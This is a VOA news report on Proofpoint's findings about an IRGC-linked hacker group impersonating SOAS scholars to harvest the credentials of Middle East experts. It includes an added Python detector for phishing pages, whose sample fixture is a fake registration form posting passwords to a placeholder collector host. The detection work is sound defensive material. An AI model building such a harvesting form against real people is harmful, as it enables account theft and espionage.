By Masood Farivar, VOA
WASHINGTON – A notorious group of hackers tied to Iran’s Islamic Revolutionary Guard Corps has waged a covert campaign targeting university professors and other experts based in the U.K. and the U.S. in an attempt to steal their sensitive information, according to research by the cybersecurity firm Proofpoint.
The group, known as TA453 and Charming Kitten, has been masquerading as British scholars at the University of London’s School of Oriental and African Studies (SOAS) since at least January in approaching their victims, Proofpoint said in a new report released Tuesday.
The Proofpoint researchers said they could not independently confirm that the hacker group is part of the IRGC, but they assess with “high confidence” that it supports the IRGC’s intelligence collection efforts. The IRGC was founded after the Iranian Revolution as a parallel force to the Iranian military. The hackers have previously targeted American and Israeli medical researchers, the Munich Security Conference and a U.S. presidential campaign, according to Proofpoint.
The targets of the latest hacking campaign included think tank experts on Middle Eastern affairs, top professors at well-known academic institutions and journalists specializing in the Middle East — all individuals with information about foreign policy, insights into Iranian dissident movements and an understanding of U.S. nuclear talks, the Proofpoint researchers said. Most of the victims had been previously hit by the same hacker group, they said.
“TA453’s continued interest in these targets demonstrates a persistent Iranian commitment to use cyber operations to collect information in support of IRGC intelligence priorities,” Sherrod DeGrippo, senior director for threat research and detection at Proofpoint, wrote in an email to VOA. “TA453’s targeting may demonstrate a desire to understand the informal policy discussions and positions that may occur outside of government but still influence decision makers.”
The company did not disclose the names of the targets but said it has worked with authorities to notify the victims.
In a hacking campaign of this kind, known as credential harvesting, the attackers first build rapport with the victim over email and only then send a malicious attachment or a link to a login page, in this case hosted on a compromised legitimate website, designed to capture the victim’s passwords.
As part of the latest operation, dubbed SpoofedScholars, the IRGC-tied hacker group compromised the website of SOAS Radio and then sent the targets a conference “registration link” to the site, according to the researchers. The compromised website was tweaked to capture a variety of credentials, the report said.
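A compromised legitimate site defeats domain-reputation checks, since the host itself is genuine; what gives the page away is its content. The following Python script, an added example that is not code from Proofpoint or from VOA, applies three content heuristics to a constructed page: a password prompt on a host that is not a known identity provider, a form that posts credentials to a different host, and a single page offering sign-in for several unrelated providers (one way a page ends up “capturing a variety of credentials”). The host names, the provider list and the sample HTML are placeholders written for this example, not indicators from the report.

```python
"""Content-based heuristics for a credential-harvesting page planted on a
legitimate but compromised website.

Added example, not code from Proofpoint or VOA. All host names, the
provider list and the sample HTML are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that are legitimately expected to show a password prompt.
# Illustrative list (assumption), not an authoritative allowlist.
KNOWN_IDP_HOSTS = {"login.microsoftonline.com", "accounts.google.com", "login.yahoo.com"}
# Brand words whose co-occurrence on one non-IdP page suggests a multi-provider kit.
PROVIDER_WORDS = {"google", "microsoft", "outlook", "yahoo", "aol"}


class _FormScanner(HTMLParser):
    """Collect each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        self.text.append(data.lower())


def analyze_page(page_url, html):
    """Return a list of indicator strings; an empty list means nothing suspicious."""
    page_host = (urlparse(page_url).hostname or "").lower()
    scanner = _FormScanner()
    scanner.feed(html)
    text = " ".join(scanner.text)
    findings = []

    password_forms = [f for f in scanner.forms if f["has_password"]]
    if password_forms and page_host not in KNOWN_IDP_HOSTS:
        findings.append(f"password prompt on host that is not an identity provider: {page_host}")
    for form in password_forms:
        # A relative action posts back to the page host; an absolute one may not.
        action_host = (urlparse(form["action"]).hostname or page_host).lower()
        if action_host != page_host:
            findings.append(f"credentials posted off-site to {action_host}")

    providers = sorted(w for w in PROVIDER_WORDS if w in text)
    if len(providers) >= 2 and page_host not in KNOWN_IDP_HOSTS:
        findings.append("offers sign-in for several providers on one page: " + ", ".join(providers))
    return findings


# Constructed sample: a fake "conference registration" page on a placeholder
# academic host standing in for a compromised legitimate site.
SAMPLE_URL = "https://radio.example.ac.uk/conference/register"
SAMPLE_HTML = """
<html><body>
<h1>Conference registration</h1>
<p>Please sign in with your institutional account to confirm attendance.</p>
<button>Sign in with Google</button>
<button>Sign in with Microsoft</button>
<button>Sign in with Yahoo</button>
<form method="post" action="https://collector.example.net/submit">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Register">
</form>
</body></html>
"""

# Constructed benign control: a real identity provider posting to itself.
BENIGN_URL = "https://accounts.google.com/signin"
BENIGN_HTML = '<form action="/signin/challenge"><input type="password" name="Passwd"></form>'

if __name__ == "__main__":
    for finding in analyze_page(SAMPLE_URL, SAMPLE_HTML):
        print("SUSPICIOUS:", finding)
    print("benign findings:", analyze_page(BENIGN_URL, BENIGN_HTML))
```

The heuristics are deliberately simple and will miss a kit that embeds its form in JavaScript or posts to the same host; they illustrate why a link from a trusted domain still warrants content inspection, and why phishing-resistant second factors, rather than URL allowlists, are the durable control against this pattern.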
In one case, a hacker posing as a “senior teaching and research fellow” with SOAS sent “an initial email trying to entice the target with a prospective invitation to an online conference on ‘The U.S. Security Challenges in the Middle East.’” After an exchange that confirmed the victim’s interest in the conference, the hacker sent the target a “detailed invitation” to the fake event, researchers said.
While it remains unclear whether the hackers managed to steal the targets’ credentials, DeGrippo said that historically the group has used stolen passwords to “exfiltrate inbox contents” and has then used the compromised accounts to conduct further phishing attacks.
Proofpoint, which monitors a variety of Iranian hacker groups, says it has tracked TA453 since 2017. Proofpoint researchers say Operation SpoofedScholars is one of the more sophisticated TA453 campaigns they’ve identified.
The U.S. intelligence community said it is “most concerned” about the cyber capabilities of Russia, Iran, China and North Korea. In its latest assessment in April, the intelligence community said, “Iran’s expertise and willingness to conduct aggressive cyber operations make it a significant threat to the security of U.S. and allied networks and data.”
“Iran has the ability to conduct attacks on critical infrastructure, as well as to conduct influence and espionage activities,” the assessment said.
During the 2020 presidential campaign, Iranian hackers sent threatening emails to Democratic voters in October, and in December released information about U.S. election officials to undermine confidence in the election, according to the Proofpoint report.